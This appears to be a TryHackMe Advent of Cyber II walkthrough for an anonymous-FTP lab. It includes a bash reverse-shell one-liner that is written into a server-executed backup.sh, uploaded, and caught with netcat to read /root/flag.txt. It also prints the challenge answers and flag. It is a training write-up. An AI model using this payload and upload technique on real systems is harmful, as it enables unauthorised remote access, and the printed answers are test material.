Try Hack Me
  • Try Hack Me
  • Rooms
  • Tutorial
    • Welcome to TryHackMe
    • Welcome
    • Tutorial
    • Starting Out In Cyber Sec
    • Welcome
  • Capture The Flag
    • Advent of Cyber
      • Task 1 - 10
      • Task 11 - 20
      • Task 21 - 29
      • PDF - materials
    • Anonymous
    • Mnemonic
    • Bounty Hacker
    • Ignite
    • Pickle Rick
    • Simple CTF
    • Agent Sudo
    • Mr. Robot
  • Advent of Cyber II
    • A Christmas Crisis
    • The Elf Strikes Back!
    • Christmas Chaos
    • Santa's watching
    • Someone stole Santa's gift list!
    • Be careful with what you wish on a Christmas night
    • The Grinch Really Did Steal Christmas
    • What's Under the Christmas Tree?
    • Anyone can be Santa!
    • Don't be sElfish!
    • The Rogue Gnome
    • Ready, set, elf.
    • Coal for Christmas
    • Where's Rudolph?
    • There's a Python in my stocking!
    • Help! Where is Santa?
    • ReverseELFneering
    • The Bits of Christmas
    • The Naughty or Nice List
    • PowershELlF to the rescue
    • Time for some ELForensics
    • Elf McEager becomes CyberElf
    • The Grinch strikes again!
    • The Trial Before Christmas
    • Thank You
  • Linux
    • Linux Fundamentals Part 1
    • Linux Fundamentals Part 2
    • Linux Fundamentals Part 3
    • LinuxCTF - Linux Challenges
    • Learn Linux - wip
    • Find - wip
  • Windows
    • Intro to Windows
  • OSINT
    • Introductory Researching - wip
    • Google Dorking
    • OhSINT
    • Sublist3r
    • Searchlight - IMINT
    • Geolocating Images
  • Crypto
    • Hashing - Crypto 101
    • Encryption - Crypto 101
    • CrackTheHash - wip
  • Network
    • Introductory Networking
    • Nmap
    • Network Services - wip
    • Network Services 2 - wip
    • Networking - wip
    • Nmap - wip
    • TOR
  • Web
    • Web Fundamentals
  • Pentest
    • Pentest questionaire
  • Hardware
    • Dumping Router Firmware
  • HELP
  • Reverse
    • Reversing ELF
Powered by GitBook
On this page
  • Video
  • Resources
  • Challenge
  • Name the directory on the FTP server that has data accessible by the "anonymous" user
  • What script gets executed within this directory?
  • What movie did Santa have on his Christmas shopping list?
  • Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!

Was this helpful?

  1. Advent of Cyber II

Anyone can be Santa!

Networking - FTP

PreviousWhat's Under the Christmas Tree?NextDon't be sElfish!

Last updated 4 years ago

Was this helpful?

Video

Resources

The standard for these two connections are the two ports:

  • Port 20 (Data)

  • Port 21 (Commands)

bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1

Challenge

Name the directory on the FTP server that has data accessible by the "anonymous" user

ftp 10.10.130.142
anonymous
ls

public

What script gets executed within this directory?

ftp 10.10.130.142
anonymous
ls
cd public
ls

backup.sh

What movie did Santa have on his Christmas shopping list?

ftp 10.10.130.142
anonymous
cd public
get shoppinglist.txt
quit
cat shoppinglist.txt

The Polar Express

Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!

Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have set up a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.

ftp 10.10.130.142
anonymous
cd public
get backup.sh
vi backup.sh

bash -i >& /dev/tcp/10.14.4.204/4444 0>&1
put backup.sh
nc -lnp 4444
cd /root
cat flag.txt

THM{even_you_can_be_santa}

pentesters cheatsheet